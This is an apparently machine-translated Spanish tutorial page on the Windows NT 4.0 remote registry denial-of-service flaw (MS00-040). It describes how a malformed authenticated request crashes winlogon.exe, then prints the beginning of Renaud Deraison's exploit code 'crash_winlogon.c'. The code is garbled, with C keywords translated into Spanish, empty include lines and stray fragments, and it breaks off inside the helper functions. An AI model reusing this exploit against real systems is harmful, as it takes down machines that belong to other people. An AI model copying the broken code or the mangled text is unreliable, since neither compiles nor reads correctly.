Windows? NT? 4.0? Vulnerabilidad de ataque de denegación de servicio en el registro remoto

        El tutorial de registro que está viendo es: ¿Windows? ¿NT? 4.0? Vulnerabilidad de ataque de denegación de servicio en el registro remoto - Raiders de registro.

59, Vulnerabilidad de ataque de denegación de servicio de registro remoto de Windows NT 4.0

Vulnerabilidad de ataque de denegación de servicio de registro remoto de Windows NT 4.0 Fecha de publicación: Sistemas afectados: - Estación de trabajo Microsoft Windows NT 4.0 - Servidor Microsoft Windows NT 4.0 - Microsoft Windows NT 4.0 Server, Enterprise Edition - Microsoft Windows NT 4.0 Server,

Terminal Server Edition no se ve afectado Sistema: Windows 2000 Descripción: Antes de que se procese la solicitud de acceso al registro del host remoto, debe registrarse de forma remota. El servidor de tablas está autenticado. Si envía una solicitud en un formato incorrecto, se interpretará el error del servidor remoto del registro

y se producirá un error que no funcionará. En Windows Nt 4.0, dado que el servidor de registro está incluido en el proceso del sistema winlogon.exe, un error en este proceso hará que todo el sistema no esté disponible. Tenga en cuenta que solo un usuario que ha sido autenticado por

puede iniciar dicha solicitud, y una conexión anónima (sesión vacía) no puede causar dicho ataque de denegación de servicio. El sistema atacado debe reiniciarse para funcionar correctamente. < * Fuente:

Renaud Deraison from Nessus Team Boletín de seguridad de Microsoft (MS00-040) * > Procedimiento de prueba: ADVERTENCIA Los siguientes procedimientos (métodos) pueden ser ofensivos y están destinados solo a fines de investigación de seguridad y enseñanza. . ¡Los usuarios están bajo su propio riesgo! /** crash_winlogon.c **

por Renaud Deraison - [email protected]** Este código se publica bajo la Licencia Pública General de GNU. *

(Gracias por respetar esto Licencia) ** En caso de que se lo pregunte, aquí está el lema que solicité para este código: **

"Las estructuras son para mariquitas" * /# include #include #ifdef WIN32 # include #define bzero (x , y) memset (x, 0, y) # else # include #include

#include #include #define closesocket (x) close (x) #endifchar * netbios_name (char * orig) {int I, Len; char * ret = malloc (40); bzero (ret, 40); len = strlen (orig); para (I = 0; I < 16; I ++) {if (I > = len) strcat (ret, "CA"); else {int odiv, omod; odiv = (orig [I] /16) + 'A'; omod =

(orig [I]% 16) + 'A'; ret [ ,null,null,3],Strlen (ret)] = odiv; ret [strlen (ret)] = omod;}} return (ret);} char * netbios_redirector () {int I; char * ret = malloc (31); bzero (ret, 31); para (I = 0; I < 15; I ++) strcat (ret, "CA"); strcat (ret, "AA"); return (ret);} char * unicode (char * data) {int len ​​= strlen (datos); int I; char * ret = malloc (110); int l = 0; bzero (re t, 110); para (I = 0; I